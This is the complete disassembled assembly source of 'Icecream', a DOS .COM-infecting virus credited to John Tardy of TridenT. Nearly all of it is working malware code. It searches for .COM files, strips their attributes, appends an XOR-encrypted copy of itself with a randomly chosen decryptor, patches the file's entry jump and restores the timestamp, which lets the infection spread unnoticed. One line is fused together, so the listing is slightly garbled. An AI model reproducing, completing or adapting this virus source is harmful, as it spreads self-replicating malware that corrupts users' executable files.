Icecream
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
.model tiny
.code
org 100h
start:
db 0e9h,0ch,0
Author_Name db 'John Tardy'
db 0E2h,0FAh
Virus_Entry:
push ax
call Get_Offset
Get_Offset:
pop ax
sub ax,offset Get_Offset
db 89h,0c5h
lea si,[bp+Storage]
mov di,100h
movsw
movsb
mov ah,1Ah
mov dx,0f900h
int 21h
mov ah,4Eh
FindFirstNext:
lea dx,[bp+ComMask]
xor cx,cx
int 21h
jnc InfectFile
Restore_DTA:
mov ah,1Ah
mov dx,80h
int 21h
mov bx,offset start
pop ax
push bx
retn
InfectFile:
mov ax,4300h
mov dx,0f91eh
int 21h
push cx
mov ax,4301h
xor cx,cx
int 21h
mov ax,3D02h
int 21h
mov bx,5700h
xchg ax,bx
int 21h
push cx
push dx
and cx,1Fh
cmp cx,1
jne ContinueInfection
db 0e9h,69h,0
ContinueInfection:
mov ah,3Fh
lea dx,[bp+Storage]
mov cx,3
int 21h
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah
je DoneInfect
cmp ax,5A4Dh
je DoneInfect
pop dx
pop cx
and cx,0FFE0h
or cx,1
push cx
push dx
mov ax,4202hcall Move_FP
sub ax,3
mov cs:[JumpSize+bp],ax
add ax,10Fh
mov word ptr [bp+EncPtr1+1],ax
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption
mov ah,40h
mov dx,0fa00h
mov cx,1F5h
int 21h
mov ax,4200h
call Move_FP
mov ah,40h
lea dx,[bp+JumpBytes]
mov cx,3
int 21h
call FinishFile
jmp Restore_DTA
DoneInfect:
call FinishFile
mov ah,4Fh
jmp FindFirstNext
Move_FP:
xor cx,cx
xor dx,dx
int 21h
ret
FinishFile:
pop si dx cx
mov ax,5701h
int 21h
mov ah,3Eh
int 21h
mov ax,4301h
pop cx
mov dx,0fc1eh
int 21h
push si
retn
Message db ' I scream, you scream, we both '
db 'scream for an ice-cream! '
SetupEncryption:
xor byte ptr [bp+10Dh],2
xor ax,ax
mov es,ax
mov ax,es:[46ch]
push cs
pop es
push ax
and ax,7FFh
add ax,1E9h
mov word ptr [bp+EncSize1+1],ax
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3
shl ax,1
mov si,ax
mov ax,[bp+si+EncData1]
add ax,bp
mov si,ax
lea di,[bp+103h]
movsw
movsw
movsw
movsw
pop ax
stosb
movsb
mov dl,al
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch
rep movsb
lea si,[bp+10Fh]
mov cx,1E9h
EncryptVirus:
lodsb
db 30h,0d0h
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
KeyWasZero:
mov si,offset AuthorName
mov di,0fa00h
mov cx,0Ah
rep movsb
mov ax,cs:[JumpSize+bp]
add ax,0Ch
mov cs:[JumpSize+bp],ax
retn
db '[TridenT]'
EncData1 dw 02beh
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
Encryptions:
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
AuthorName db 'John Tardy'
JumpBytes db 0E9h
JumpSize dw 0
ComMask db '*.CoM',0
Storage dw 20CDh
db 21h
end start